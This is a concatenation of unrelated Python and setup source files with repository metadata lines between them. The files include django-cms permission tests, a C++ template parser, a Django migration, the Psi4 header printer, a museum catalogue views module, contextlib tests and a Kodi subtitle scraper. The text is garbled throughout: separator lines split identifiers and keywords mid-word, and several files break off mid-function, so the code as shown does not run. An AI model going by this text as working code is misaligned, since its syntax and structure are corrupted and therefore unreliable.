self.user_super = self._create_user("super", is_staff=True,
is_superuser=True)
self.user_staff = self._create_user("staff", is_staff=True,
add_default_permissions=True)
self.add_permission(self.user_staff, 'publish_page')
self.user_master = self._create_user("master", is_staff=True,
add_default_permissions=True)
self.add_permission(self.user_master, 'publish_page')
self.user_slave = self._create_user("slave", is_staff=True,
add_default_permissions=True)
self.user_normal = self._create_user("normal", is_staff=False)
self.user_normal.user_permissions.add(
Permission.objects.get(codename='publish_page'))
with self.login_user_context(self.user_super):
self.home_page = create_page("home", "nav_playground.html", "en",
created_by=self.user_super)
# master page & master user
self.master_page = create_page("master", "nav_playground.html", "en")
# create non global, non staff user
self.user_non_global = self._create_user("nonglobal")
# assign master user under home page
assign_user_to_page(self.home_page, self.user_master,
grant_on=ACCESS_PAGE_AND_DESCENDANTS, grant_all=True)
# and to master page
assign_user_to_page(self.master_page, self.user_master,
grant_on=ACCESS_PAGE_AND_DESCENDANTS, grant_all=True)
# slave page & slave user
self.slave_page = create_page("slave-home", "col_two.html", "en",
parent=self.master_page, created_by=self.user_super)
assign_user_to_page(self.slave_page, self.user_slave, grant_all=True)
# create page_b
page_b = create_page("pageB", "nav_playground.html", "en", created_by=self.user_super)
# Normal user
# it's allowed for the normal user to view the page
assign_user_to_page(page_b, self.user_normal, can_view=True)
# create page_a - sample page from master
page_a = create_page("pageA", "nav_playground.html", "en",
created_by=self.user_super)
assign_user_to_page(page_a, self.user_master,
can_add=True, can_change=True, can_delete=True, can_publish=True,
can_move_page=True)
# publish after creating all drafts
publish_page(self.home_page, self.user_super, 'en')
publish_page(self.master_page, self.user_super, 'en')
self.page_b = publish_page(page_b, self.user_super, 'en')
def _add_plugin(self, user, page):
"""
Add a plugin using the test client to check for permissions.
"""
with self.login_user_context(user):
placeholder = page.placeholders.all()[0]
post_data = {
'body': 'Test'
}
endpoint = self.get_add_plugin_uri(placeholder, 'TextPlugin')
response = self.client.post(endpoint, post_data)
self.assertEqual(response.status_code, 302)
return response.content.decode('utf8')
def test_super_can_add_page_to_root(self):
with self.login_user_context(self.user_super):
response = self.client.get(URL_CMS_PAGE_ADD)
self.assertEqual(response.status_code, 200)
def test_master_cannot_add_page_to_root(self):
with self.login_user_context(self.user_master):
response = self.client.get(URL_CMS_PAGE_ADD)
self.assertEqual(response.status_code, 403)
def test_slave_cannot_add_page_to_root(self):
with self.login_user_context(self.user_slave):
response = self.client.get(URL_CMS_PAGE_ADD)
self.assertEqual(response.status_code, 403)
def test_slave_can_add_page_under_slave_home(self):
with self.login_user_context(self.user_slave):
# move to admin.py?
# url = URL_CMS_PAGE_ADD + "?target=%d&position=last-child" % slave_page.pk
# can he even access it over get?
# response = self.client.get(url)
# self.assertEqual(response.status_code, 200)
# add page
page = create_page("page", "nav_playground.html", "en",
parent=self.slave_page, created_by=self.user_slave)
# adds user_slave as page moderator for this page
# public model shouldn't be available yet, because of the moderation
# moderators and approval ok?
# must not have public object yet
self.assertFalse(page.publisher_public)
self.assertObjectExist(Title.objects, slug="page")
self.assertObjectDoesNotExist(Title.objects.public(), slug="page")
self.assertTrue(user_can_publish_page(self.user_slave, page))
# publish as slave, published
|
lukeolson/crappy
|
utils.py
|
Python
|
bsd-3-clause
| 5,160
| 0.00155
|
import re
import numpy as np
def identify_templates(hfile):
"""
Parameters
----------
hfile : string
.h header file to be parsed
Returns
-------
tdict : dictionary
dictionary of lists
each dictionary is a function
each list identifies the arglist
Notes
-----
The header looks for
template <class I, class T>
void myfunc(const I n, const T a, const T * x, T * y){
...
}
rules:
- 'template' identifies the start of a templated function
- the argument list is limited to
- I: int array
- T: data array
- if *, then pointer type
else, scalar
- multiples of the same type look like I1, I2, ...
- in addition 'const' and 'void'
- in addition operators of the form OP&
- then it makes i, I, t, T, depending on type
"""
types = ['i', 'I', 't', 'T']
with open(hfile, 'rU') as hfid:
text = hfid.read()
|
temp_iter = re.finditer('template\s*\<', text)
temp_start = [m.start(0) for m in temp_iter]
docst_iter = re.finditer(r'//\s*begin{docstring}', text)
docst_start = [m.start(0) for m in docst_iter]
docst_iter = re.finditer(r'//\s*end{docstring}', text)
docst_end = [m.start(0) for m in docst_iter]
# check begin and end docstrings
i
|
f len(docst_start) != len(docst_end):
raise ValueError('Problem with docstring begin{docstring} ' +
'or end{docstring}')
# each docstring is associated with some template
# each template is not associated with some docstring
# associate the templates with docstring if possible (from docstrong POV)
temp_start = np.array(temp_start)
docst = ['' for t in range(len(temp_start))]
cppcomment = re.compile('^//')
for ms, me in zip(docst_start, docst_end):
if ms >= me:
raise ValueError('Problem with docstring begin{docstring} ' +
'or end{docstring}')
docid = np.where(ms < temp_start)[0][0]
docstring = text[ms:me].splitlines()
pdocstring = []
for d in docstring[1:]: # not the first line
pdocstring.append(cppcomment.sub('', d))
docst[docid] = '\n'.join(pdocstring)
classre = re.compile('template.*<(.+?)>')
funcre = re.compile('template\s*<.*?>(.+?){', re.DOTALL)
argsre = re.compile('(.+?)\s+(.+?)\s*\((.*?)\)', re.DOTALL)
tidre = re.compile('([%s])' % ''.join(types) + '([0-9]+)')
funcs = []
print('[identify_templates] ...parsing %s' % hfile)
k = 0
for tstart in temp_start:
# class list
classes = classre.search(text, tstart).group(1).strip()
# function call
funccall = funcre.search(text, tstart).group(1).strip()
# check classes
classes = re.sub('class', '', classes)
classes = re.sub('typename', '', classes)
classes = re.sub('\s', '', classes).split(',')
for tid in classes:
if len(tid) == 1:
thistype = tid
else:
m = tidre.match(tid)
thistype = m.group(1).strip()
thisnum = m.group(2).strip()
del thisnum
if thistype not in types:
raise ValueError('class type \'%s\' not supported' % thistype +
' in your header file %s' % hfile)
# get the function declaration
m = argsre.match(funccall)
funcret = m.group(1).strip()
funcname = m.group(2).strip()
funcargs = m.group(3).strip()
args = funcargs.split(',')
# mark args, const, type
if len(args[0]) == 0:
args = []
const = []
atype = []
for arg in args:
if 'const ' in arg:
const.append(True)
else:
const.append(False)
arg = arg.replace('const', '').strip()
if ('*' in arg) or ('[]' in arg):
atype.append(arg[0].upper())
else:
atype.append(arg[0].lower())
if funcret == 'void':
spec = 'v'
else:
spec = funcret
for c, t in zip(const, atype):
if c:
spec += t
else:
spec += '*' + t
funcs.append({'func': funcname, 'const': const, 'atype': atype,
'ret': funcret, 'spec': spec,
'docstring': docst[k]})
print('\t...found %s(...)' % funcname)
k += 1
return funcs
if __name__ == '__main__':
import sys
if len(sys.argv) == 1:
import os
temps = os.listdir('./templates')
example_templates = [h for h in temps
if (h.startswith('example') and h.endswith('.h'))]
example_templates = ['example.h']
funcs = identify_templates(example_templates, './templates/')
else:
f = sys.argv[1]
funcs = identify_templates(f)
for func in funcs:
print(func['func'])
print(' %s' % func['spec'])
|
GETLIMS/LIMS-Backend
|
lims/projects/migrations/0011_auto_20160822_1527.py
|
Python
|
mit
| 415
| 0
|
# -*- cod
|
ing: utf-8 -*-
from __future__ import unicode_literals
from
|
django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('projects', '0010_product_design_format'),
]
operations = [
migrations.AlterField(
model_name='product',
name='design',
field=models.TextField(null=True, blank=True),
),
]
|
kratman/psi4public
|
psi4/header.py
|
Python
|
gpl-2.0
| 2,628
| 0.003425
|
#
# @BEGIN LICENSE
#
# Psi4: an open-source quantum chemistry software package
#
# Copyright (c) 2007-2017 The Psi4 Developers.
#
# The copyrights for code used from other parties are included in
# the corresponding files.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# @END LICENSE
#
import datetime
import os
from . import core
from .metadata import __version__, version_formatter
time_string = datetime.datetime.now().strftime('%A, %d %B %Y %I:%M%p')
pid = os.getpid()
def sizeof_fmt(num, suffix='B'):
for unit in ['','Ki','Mi','Gi','Ti','Pi','Ei','Zi']:
if abs(num) < 1024.0:
return "%3.1f %s%s" % (num, unit, suffix)
num /= 1024.0
return "%.1f %s%s" % (num, 'Yi', suffix)
def print_header():
driver_info = version_formatter("""{version} {release}""")
git_info = version_formatter("""{{{branch}}} {githash} {clean}""")
datadir = core.get_environment("PSIDATADIR")
memory = sizeof_fmt(core.get_memory())
threads = str(core.get_num_threads())
header = """
-----------------------------------------------------------------------
Psi4: An Open-Source Ab Initio Electronic Structure Package
Psi4 %s
Git: Rev %s
R. M. Parrish, L. A. Burns, D. G. A. Smith, A. C. Simmonett,
A. E. DePrince III, E. G. Hohenstein, U. Bozkaya, A. Yu. Sokol
|
ov,
R. Di Remigio, R. M. Richard, J. F. Gonthier, A. M. James,
H. R. McAlexander, A. Kumar, M. Saitow, X. Wang, B. P
|
. Pritchard,
P. Verma, H. F. Schaefer III, K. Patkowski, R. A. King, E. F. Valeev,
F. A. Evangelista, J. M. Turney, T. D. Crawford, and C. D. Sherrill,
submitted.
-----------------------------------------------------------------------
Psi4 started on: %s
Process ID: %6d
PSIDATADIR: %s
Memory: %s
Threads: %s
""" % (driver_info, git_info, time_string, pid, datadir, memory, threads)
core.print_out(header)
|
mbranko/kartonpmv
|
osnovni/views.py
|
Python
|
mit
| 9,507
| 0.001367
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
from dateutil import relativedelta
from django.contrib.auth.decorators import login_required
from django.shortcuts import render, redirect
from django.db.models import Q, Count
from django_tables2 import RequestConfig
from osnovni.forms import PredmetForm, PredmetSearchForm
from osnovni.models import *
from osnovni.tables import *
@login_required
def index(request):
return render(request, 'osnovni/index.html')
@login_required
def novi_predmet(request):
if request.method == 'POST':
form = PredmetForm(request.POST, request.FILES)
if form.is_valid():
pred = form.save()
ist = IstorijaIzmenaPredmeta()
ist.predmet = pred
ist.radnik = request.user.radnik
ist.timestamp = datetime.datetime.now()
ist.save()
return redirect('index')
else:
print(form.errors)
else:
form = PredmetForm(initial={'kreirao': request.user.radnik, 'datum_kreiranja': datetime.date.today()})
context = {'form': form,
'pagetitle': u'Novi karton',
'maintitle': u'Novi karton',
'titleinfo': u'Kreiranje novog kartona',
'form_mode': 'new'}
return render(request, 'osnovni/predmet.html', context)
@login_required
def predmet(request, predmet_id):
try:
pred = MuzejskiPredmet.objects.get(pk=predmet_id)
except MuzejskiPredmet.DoesNotExist:
return redirect('index')
template = 'osnovni/predmet.html'
context = {}
context['pagetitle'] = u'Pregled kartona'
context['maintitle'] = u'Pregled kartona'
context['titleinfo'] = u'Pregled podataka u kartonu inv.br. ' + str(pred.inv_broj)
context['form_mode'] = 'edit'
if request.method == 'POST':
form = PredmetForm(request.POST, request.FILES, instance=pred)
if form.is_valid():
pred = form.save()
ist = IstorijaIzmenaPredmeta()
ist.predmet = pred
ist.radnik = request.user.radnik
ist.timestamp = datetime.datetime.now()
ist.save()
return redirect('index')
else:
print(form.errors)
|
else:
form = Predmet
|
Form(instance=pred)
if request.user.radnik.uloga.id > 2:
context['predmet'] = pred
context['titleinfo'] = u'Pregled podataka u kartonu inv.br. ' + str(pred.inv_broj)
template = 'osnovni/predmet_view.html'
istorija = IstorijaIzmenaPredmeta.objects.filter(predmet=pred).order_by('timestamp')
table = PredmetHistoryList(istorija)
RequestConfig(request, paginate={'per_page': 20}).configure(table)
context['form'] = form
context['table'] = table
return render(request, template, context)
@login_required
def pretraga(request):
if request.method == 'POST':
form = PredmetSearchForm(request.POST)
if form.is_valid():
query = None
query_desc = ''
inv_br = form.cleaned_data['inv_br']
if inv_br is not None and inv_br != '':
q = Q(inv_broj=inv_br)
query = query & q if query is not None else q
query_desc += ' inv.br:' + str(inv_br)
vrsta_predmeta = form.cleaned_data['vrsta_predmeta']
if vrsta_predmeta is not None and vrsta_predmeta != '':
q = Q(vrsta_predmeta__icontains=vrsta_predmeta)
query = query & q if query is not None else q
query_desc += ' predmet:' + vrsta_predmeta
vrsta_zbirke = form.cleaned_data['vrsta_zbirke']
if vrsta_zbirke is not None:
q = Q(vrsta_zbirke_id=vrsta_zbirke.id)
query = query & q if query is not None else q
query_desc += ' zbirka:' + vrsta_zbirke.naziv
vreme_nastanka = form.cleaned_data['vreme_nastanka']
if vreme_nastanka is not None and vreme_nastanka != '':
q = Q(vreme_nastanka__icontains=vreme_nastanka)
query = query & q if query is not None else q
query_desc += ' vreme:' + vreme_nastanka
datum_nastanka1 = form.cleaned_data['datum_nastanka1']
if datum_nastanka1 is not None:
q = Q(datum_nastanka__gte=datum_nastanka1)
query = query & q if query is not None else q
query_desc += ' od:' + datetime.date.strftime(datum_nastanka1, '%d.%m.%Y.')
datum_nastanka2 = form.cleaned_data['datum_nastanka2']
if datum_nastanka2 is not None:
q = Q(datum_nastanka__lte=datum_nastanka2)
query = query & q if query is not None else q
query_desc += ' do:' + datetime.date.strftime(datum_nastanka2, '%d.%m.%Y.')
mesto_nastanka = form.cleaned_data['mesto_nastanka']
if mesto_nastanka is not None:
q = Q(mesto_nastanka2=mesto_nastanka)
query = query & q if query is not None else q
query_desc += ' mesto:' + mesto_nastanka.naziv
autor = form.cleaned_data['autor']
if autor is not None and autor != '':
q = Q(autor__icontains=autor)
query = query & q if query is not None else q
query_desc += ' autor:' + autor
opis = form.cleaned_data['opis']
if opis is not None and opis != '':
q = Q(opis__icontains=opis)
query = query & q if query is not None else q
query_desc += ' opis:' + opis
kategorija = form.cleaned_data['kategorija']
if kategorija is not None:
q = Q(kategorija=kategorija)
query = query & q if query is not None else q
query_desc += ' kat:' + kategorija.naziv
obradio = form.cleaned_data['obradio']
if obradio is not None and obradio != '':
q = Q(obradio__icontains=obradio)
query = query & q if query is not None else q
query_desc += ' obradio:' + obradio
uneo = form.cleaned_data['uneo']
if uneo is not None:
q = Q(kreirao=uneo)
query = query & q if query is not None else q
query_desc += ' uneo:' + uneo.puno_ime()
datum_unosa1 = form.cleaned_data['datum_unosa1']
if datum_unosa1 is not None:
q = Q(datum_kreiranja__gte=datum_unosa1)
query = query & q if query is not None else q
query_desc += ' unos_od:' + datetime.date.strftime(datum_unosa1, '%d.%m.%Y.')
datum_unosa2 = form.cleaned_data['datum_unosa2']
if datum_unosa2 is not None:
q = Q(datum_kreiranja__lte=datum_unosa2)
query = query & q if query is not None else q
query_desc += ' unos_do:' + datetime.date.strftime(datum_unosa2, '%d.%m.%Y.')
if query is None:
predmeti = MuzejskiPredmet.objects.all()
else:
predmeti = MuzejskiPredmet.objects.filter(query).distinct()
return _prikazi_predmete(request, predmeti, u'Pretraga kartona', u'Rezultati pretrage', query_desc)
else:
form = PredmetSearchForm()
context = {'form': form,
'pagetitle': u'Pretraga kartona',
'maintitle': u'Pretraga kartona',
'titleinfo': u'Unesite poznate podatke'}
return render(request, 'osnovni/pretraga.html', context)
@login_required
def moji_predmeti(request):
predmeti = MuzejskiPredmet.objects.filter(kreirao=request.user.radnik)
return _prikazi_predmete(request, predmeti, u'Moji kartoni', u'Moji kartoni', u'korisnika ' + request.user.username)
def _prikazi_predmete(request, predmeti, pagetitle, maintitle, titleinfo):
table = PredmetList(predmeti)
RequestConfig(request, paginate={'per_page': 20}).configure(table)
context = {'table': table,
'pagetitle': pagetitle,
'maintitle': maintitle,
'title
|
cristicalin/setwall
|
junk/test_copy.py
|
Python
|
gpl-3.0
| 181
| 0.005525
|
import copy
from wpm.filelist import *
f = filelist()
f.load("/home/kman/bin/wpm")
f.get_list()
p = copy.copy(f)
p.sort()
f.randomize()
p.get
|
_list()
f.get_list()
p.close()
f.
|
close()
|
jenix21/DarunGrim
|
Src/Scripts/FileManagement/setup.py
|
Python
|
bsd-3-clause
| 361
| 0.108033
|
from distutils.core import setup, Extension
setup
|
(name = "win32ver",
version = "1.0",
maintainer = "Jeong Wook Oh",
maintainer_email = "oh.jeongwook@gmail.com",
description = "Win32 Version Information Retriever",
ext_modules =
|
[ Extension('win32ver',
sources = ['win32ver.cpp'],
libraries = ['version'],
platforms='x86' ) ]
)
|
MalloyPower/parsing-python
|
front-end/testsuite-python-lib/Python-3.2/Lib/test/test_contextlib.py
|
Python
|
mit
| 10,109
| 0.002968
|
"""Unit tests for contextlib.py, and other context managers."""
import sys
import tempfile
import unittest
from contextlib import * # Tests __all__
from test import support
try:
import threading
except ImportError:
threading = None
class ContextManagerTestCase(unittest.TestCase):
def test_contextmanager_plain(self):
state = []
@contextmanager
def woohoo():
state.append(1)
yield 42
state.append(999)
with woohoo() as x:
self.assertEqual(state, [1])
self.assertEqual(x, 42)
state.append(x)
self.assertEqual(state, [1, 42, 999])
def test_contextmanager_finally(self):
state = []
@contextmanager
def woohoo():
state.append(1)
try:
yield 42
finally:
state.append(999)
with self.assertRaises(ZeroDivisionError):
with woohoo() as x:
self.assertEqual(state, [1])
self.assertEqual(x, 42)
state.append(x)
raise ZeroDivisionError()
self.assertEqual(state, [1, 42, 999])
def test_contextmanager_no_reraise(self):
@contextmanager
def whee():
yield
ctx = whee()
ctx.__enter__()
# Calling __exit__ should not result in an exception
self.assertFalse(ctx.__exit__(TypeError, TypeError("foo"), None))
def test_contextmanager_trap_yield_after_throw(self):
@contextmanager
def whoo():
try:
yield
except:
yield
ctx = whoo()
ctx.__enter__()
self.assertRaises(
RuntimeError, ctx.__exit__, TypeError, TypeError("foo"), None
)
def test_contextmanager_except(self):
state = []
@contextmanager
def woohoo():
state.append(1)
try:
yield 42
except ZeroDivisionError as e:
state.append(e.args[0])
self.assertEqual(state, [1, 42, 999])
with woohoo() as x:
self.assertEqual(state, [1])
self.assertEqual(x, 42)
state.append(x)
raise ZeroDivisionError(999)
self.assertEqual(state, [1, 42, 999])
def _create_contextmanager_attribs(self):
def attribs(**kw):
def decorate(func):
for k,v in kw.items():
setattr(func,k,v)
return func
return decorate
@contextmanager
@attribs(foo='bar')
def baz(spam):
"""Whee!"""
return baz
def test_contextmanager_attribs(self):
baz = self._create_contextmanager_attribs()
self.assertEqual(baz.__name__,'baz')
self.assertEqual(baz.foo, 'bar')
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_contextmanager_doc_attrib(self):
baz = self._create_contextmanager_attribs()
self.assertEqual(baz.__doc__, "Whee!")
class ClosingTestCase(unittest.TestCase):
# XXX This needs more work
def test_closing(self):
state = []
class C:
def close(self):
state.append(1)
|
x = C()
self.assertEqual(state, [])
with closing(x) as y:
self.assertEqual(x, y)
self.assertEqual(state, [1])
def test_closing_error(self):
state = []
class C:
def cl
|
ose(self):
state.append(1)
x = C()
self.assertEqual(state, [])
with self.assertRaises(ZeroDivisionError):
with closing(x) as y:
self.assertEqual(x, y)
1 / 0
self.assertEqual(state, [1])
class FileContextTestCase(unittest.TestCase):
def testWithOpen(self):
tfn = tempfile.mktemp()
try:
f = None
with open(tfn, "w") as f:
self.assertFalse(f.closed)
f.write("Booh\n")
self.assertTrue(f.closed)
f = None
with self.assertRaises(ZeroDivisionError):
with open(tfn, "r") as f:
self.assertFalse(f.closed)
self.assertEqual(f.read(), "Booh\n")
1 / 0
self.assertTrue(f.closed)
finally:
support.unlink(tfn)
@unittest.skipUnless(threading, 'Threading required for this test.')
class LockContextTestCase(unittest.TestCase):
def boilerPlate(self, lock, locked):
self.assertFalse(locked())
with lock:
self.assertTrue(locked())
self.assertFalse(locked())
with self.assertRaises(ZeroDivisionError):
with lock:
self.assertTrue(locked())
1 / 0
self.assertFalse(locked())
def testWithLock(self):
lock = threading.Lock()
self.boilerPlate(lock, lock.locked)
def testWithRLock(self):
lock = threading.RLock()
self.boilerPlate(lock, lock._is_owned)
def testWithCondition(self):
lock = threading.Condition()
def locked():
return lock._is_owned()
self.boilerPlate(lock, locked)
def testWithSemaphore(self):
lock = threading.Semaphore()
def locked():
if lock.acquire(False):
lock.release()
return False
else:
return True
self.boilerPlate(lock, locked)
def testWithBoundedSemaphore(self):
lock = threading.BoundedSemaphore()
def locked():
if lock.acquire(False):
lock.release()
return False
else:
return True
self.boilerPlate(lock, locked)
class mycontext(ContextDecorator):
started = False
exc = None
catch = False
def __enter__(self):
self.started = True
return self
def __exit__(self, *exc):
self.exc = exc
return self.catch
class TestContextDecorator(unittest.TestCase):
def test_contextdecorator(self):
context = mycontext()
with context as result:
self.assertIs(result, context)
self.assertTrue(context.started)
self.assertEqual(context.exc, (None, None, None))
def test_contextdecorator_with_exception(self):
context = mycontext()
with self.assertRaisesRegex(NameError, 'foo'):
with context:
raise NameError('foo')
self.assertIsNotNone(context.exc)
self.assertIs(context.exc[0], NameError)
context = mycontext()
context.catch = True
with context:
raise NameError('foo')
self.assertIsNotNone(context.exc)
self.assertIs(context.exc[0], NameError)
def test_decorator(self):
context = mycontext()
@context
def test():
self.assertIsNone(context.exc)
self.assertTrue(context.started)
test()
self.assertEqual(context.exc, (None, None, None))
def test_decorator_with_exception(self):
context = mycontext()
@context
def test():
self.assertIsNone(context.exc)
self.assertTrue(context.started)
raise NameError('foo')
with self.assertRaisesRegex(NameError, 'foo'):
test()
self.assertIsNotNone(context.exc)
self.assertIs(context.exc[0], NameError)
def test_decorating_method(self):
context = mycontext()
class Test(object):
@context
def method(self, a, b, c=None):
self.a = a
self.b = b
self.c = c
# these tests are for argument passing when used as a decorator
test = Test()
test.method(1, 2)
self.assertEqual(test.a, 1)
self.assertEqual(test.b, 2)
self.assertEqual(test.c, None)
test = Test()
test.method('a', 'b', 'c')
self.assertEqual(test.a, 'a')
|
cloudera/hue
|
desktop/libs/notebook/src/notebook/management/commands/samples_setup.py
|
Python
|
apache-2.0
| 2,309
| 0.003465
|
#!/usr/bin/env python
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required
|
by applicable law or agreed to in writing,
|
software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
from django.core.management.base import BaseCommand
from desktop.lib.connectors.models import _get_installed_connectors
from beeswax.management.commands.beeswax_install_examples import Command as EditorCommand
from useradmin.models import User
LOG = logging.getLogger(__name__)
class Command(BaseCommand):
args = '<user>'
help = 'Install examples but do not overwrite them.'
def add_arguments(self, parser):
parser.add_argument(
'--username',
dest='username',
default='hue',
help='Hue username used to execute the command',
)
parser.add_argument(
'--dialect',
dest='dialect',
default=None,
help='Dialect name we want to install the samples, all if not specified',
)
def handle(self, *args, **options):
LOG.info('Installing %s examples as %s' % (options.get('dialect') or 'all', options['username']))
user = User.objects.get(username=options['username'])
dialect = options.get('dialect')
dialects = [
{
'id': connector['id'],
'dialect': connector['dialect']
}
for connector in _get_installed_connectors(category='editor')
if dialect is None or connector['dialect'] == dialect
]
tables = None
for dialect in dialects:
EditorCommand().handle(
app_name=dialect['dialect'], # Unused?
user=user,
tables=tables,
dialect=dialect['dialect'],
interpreter={'type': dialect['id']}
)
|
AMOboxTV/AMOBox.LegoBuild
|
plugin.video.salts/salts_lib/srt_scraper.py
|
Python
|
gpl-2.0
| 9,410
| 0.004145
|
"""
SALTS XBMC Addon
Copyright (C) 2014 tknorris
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import os
import time
import urllib2
import re
import HTMLParser
import socket
import xbmcvfs
import log_utils
import kodi
from constants import VIDEO_TYPES
from constants import SRT_SOURCE
from constants import USER_AGENT
from db_utils import DB_Connection
MAX_RETRIES = 2
TEMP_ERRORS = [500, 502, 503, 504]
BASE_URL = 'http://www.addic7ed.com'
class SRT_Scraper():
def __init__(self):
self.db_connection = DB_Connection()
def get_tvshow_id(self, title, year=None):
match_title = title.lower()
rows = self.db_connection.get_related_url(VIDEO_TYPES.TVSHOW, title, year, SRT_SOURCE)
if rows:
tvshow_id = rows[0][0]
log_utils.log('Returning local tvshow id: |%s|%s|%s|' % (title, year, tvshow_id), log_utils.LOGDEBUG)
return tvshow_id
html = self.__get_cached_url(BASE_URL, 24)
regex = re.compile('option\s+value="(\d+)"\s*>(.*?)</option')
site_matches = []
for item in regex.finditer(html):
tvshow_id, site_title = item.groups()
# strip year off title and assign it to year if it exists
r = re.search('(\s*\((\d{4})\))$', site_title)
if r:
site_title = site_title.replace(r.group(1), '')
site_year = r.group(2)
else:
site_year = None
# print 'show: |%s|%s|%s|' % (tvshow_id, site_title, site_year)
if match_title == site_title.lower():
if year is None or year == site_year:
self.db_connection.set_related_url(VIDEO_TYPES.TVSHOW, title, year, SRT_SOURCE, tvshow_id)
return tvshow_id
site_matches.append((tvshow_id, site_title, site_year))
if not site_matches:
return None
elif len(site_matches) == 1:
self.db_connection.set_related_url(VIDEO_TYPES.TVSHOW, title, year, SRT_SOURCE, site_matches[0][0])
return site_matches[0][0]
else:
# there were multiple title matches and year was passed but no exact year matches found
for match in site_matches:
# return the match that has no year specified
if match[2] is None:
self.db_connection.set_related_url(VIDEO_TYPES.TVSHOW, title, year, SRT_SOURCE, match[0])
return match[0]
def get_season_subtitles(self, language, tvshow_id, season):
url = BASE_URL + '/ajax_loadShow.php?show=%s&season=%s&langs=&hd=%s&hi=%s' % (tvshow_id, season, 0, 0)
html = self.__get_cached_url(url, .25)
# print html.decode('ascii', 'ignore')
req_hi = kodi.get_setting('subtitle-hi') == 'true'
req_hd = kodi.get_setting('subtitle-hd') == 'true'
items = []
regex = re.compile('<td>(\d+)</td><td>(\d+)</td><td>.*?</td><td>(.*?)</td><td.*?>(.*?)</td>.*?<td.*?>(.+?)</td><td.*?>(.*?)</td><td.*?>(.*?)</td><td.*?>(.*?)</td><td.*?><a\s+href="(.*?)">.+?</td>',
re.DOTALL)
for match in regex.finditer(html):
season, episode, srt_lang, version, completed, hi, corrected, hd, srt_url = match.groups()
if not language or language == srt_lang and (not req_hi or hi) and (not req_hd or hd):
item = {}
item['season'] = season
item['episode'] = episode
item['language'] = srt_lang
item['version'] = version
if completed.lower() == 'completed':
item['completed'] = True
item['percent'] = '100'
else:
item['completed'] = False
r = re.search('([\d.]+)%', completed)
if r:
item['percent'] = r.group(1)
else:
item['percent'] = '0'
item['hi'] = True if hi else False
item['corrected'] = True if corrected else False
item['hd'] = True if hd else False
item['url'] = srt_url
items.append(item)
return items
def get_episode_subtitles(self, language, tvshow_id, season, episode):
subtitles = self.get_season_subtitles(language, tvshow_id, season)
items = []
for subtitle in subtitles:
if subtitle['episode'] == str(episode):
items.append(subtitle)
return items
def download_subtitle(self, url):
url = BASE_URL + url
(response, srt) = self.__get_url(url)
if not hasattr(response, 'info') or 'Content-Disposition' not in response.info():
return
cd = response.info()['Content-Disposition']
r = re.search('filename="(.*)"', cd)
if r:
filename = r.group(1)
else:
filename = 'addic7ed_subtitle.srt'
filename = re.sub('[^\x00-\x7F]', '', filename)
final_path = os.path.join(kodi.get_setting('subtitle-folder'), filename)
final_path = kodi.translate_path(final_path)
if not xbmcvfs.exists(os.path.dirname(final_path)):
try:
try: xbmcvfs.mkdirs(os.path.dirname(final_path))
except: os.mkdir(os.path.dirname(final_path))
except:
log_utils.log('Failed to create directory %s' % os.path.dirname(final_path), log_utils.LOGERROR)
raise
with open(final_path, 'w') as f:
f.write(srt)
return final_path
def __get_url(self, url):
try:
req = urllib2.Request(url)
host = BASE_URL.replace('http://', '')
req.add_header('User-Agent', USER_AGENT)
req.add_header('Host', host)
req.add_header('Referer', BASE_URL)
response = urllib2.urlopen(req, timeout=10)
body = response.read()
parser = HTMLParser.HTMLParser()
body = parser.unescape(body)
except Exception as e:
kodi.notify(msg='Failed to connect to URL: %s' % (url), duration=5000)
log_utils.log('Failed to connect to URL %s: (%s)' % (url, e), log_utils.LOGERROR)
return ('', '')
return (response, body)
def __get_cached_url(self, url, cache=8):
log_utils.log('Fetching Cached URL: %s' % url, log_utils.LOGDEBUG)
before = time.time()
_created, _res_header, html = self.db_connection.get_cached_url(url, cache_limit=cache)
if html:
log_utils.log('Returning cached result for: %s' % (url), log_utils.LOGDEBUG)
return html
log_utils.log('No cached url found for: %s' % url, log_utils.LOGDEBUG)
req = urllib2.Request(url)
host = BASE_URL.replace('http://', '')
req.add_header('User-Agent', USER_AGENT)
req.add_header('Host', host)
req.add_header('Referer', BASE_UR
|
L)
try:
body = self.__http_get_with_retry(url, req)
body = body.decode('utf-8')
|
parser = HTMLParser.HTMLParser()
body = parser.unescape(body)
except Exception as e:
kodi.notify(msg='Failed to connect to URL: %s' % (url), duration=5000)
log_utils.log('Failed to connect to URL %s: (%s)' % (url, e), log_utils.LOGERROR)
return ''
self.db_connection.cache_url(url, body)
after = time.time()
log_
|
ultimatepritam/HelloWeb
|
DoraTheExplorer.py
|
Python
|
gpl-3.0
| 7,919
| 0.011491
|
#This script is built as a prototype during Mozilla HelloWeb Hackathon Kolkata 2016
#An Interactive Artificial Intelligence with a friendly personality to teach 5 year olds about HTML and WEB
#Copyright Protected Under GPL3 License | Follow the License | Send Pull Requests
import re
import py
import requests
import pyaudio
import speech_recognition as sr
import os
import random
import socket
import webbrowser # facebook.com/ultimatepritam | github.com/ultimatepritam
import subprocess
